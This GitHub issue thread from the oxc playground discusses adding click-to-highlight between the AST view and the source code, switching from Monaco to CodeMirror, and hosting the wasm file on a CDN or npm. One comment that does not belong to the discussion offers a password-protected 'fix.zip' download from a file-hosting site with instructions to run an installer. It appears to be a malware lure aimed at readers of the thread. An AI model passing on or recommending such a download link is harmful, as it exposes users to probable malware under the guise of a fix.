### ISSUE TITLE
playground: click on AST to view the corresponding code

### ISSUE THREAD

**Issue by heygsc** [oxc-project/playground#30]
In the previous playground, clicking on 'ast' could find the corresponding code, which was very comfortable to use, but it seems that the current new playground does not have it.
<img width="1259" alt="image" src="https://github.com/user-attachments/assets/346c12d1-5f26-4c0d-9ca4-baa90c4b4993">

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Boshen** [comment]
I find monaco editor hard to work with, do you think we should restore the previous codemirror @DonIsaac @sxzz ? Monaco is also too large and slow to load.

**Comment by sxzz** [comment]
For better UX, I would say it's worth it. Additionally, most of the loading time is for the wasm file.

It can be implemented. You can refer to https://ast.sxzz.moe/

**Comment by heygsc** [comment]
Yes, wasm loading often takes time.

**Comment by DonIsaac** [comment]
Could be worth it. I have more experience with Monaco than I do with codemirror, but if it's super problematic then we should.

What are the downsides of a switch to codemirror?

**Comment by IWANABETHATGUY** [comment]
Maybe we could upload `.wasm` to cdn, just like swc playground
![image](https://github.com/user-attachments/assets/8eb32c74-f070-497c-be41-b784eb4812a4)

**Comment by sxzz** [comment]
That's also why I suggest boshen to publish wasm to npm. We can even change the oxc version for testing regression issue.

**Comment by sxzz** [comment]
Given the complexity of the feature and its completion on ast.sxzz.moe, I might extract the AST Tree Viewer as a Vue component for easy reuse in oxc.

**Comment by pumano** [comment]
very useful feature but not by click, but by hover as https://ast.sxzz.moe/ or https://astexplorer.net/

**Comment by Boshen** [comment]
@sxzz There are numerous people asking for this feature, including myself. It would be appreciated if you can copy the feature over from ast.sxzz.dev.

This feature seems pretty stable, so probably no need for a separate npm pacakge, just copy the code over 😁
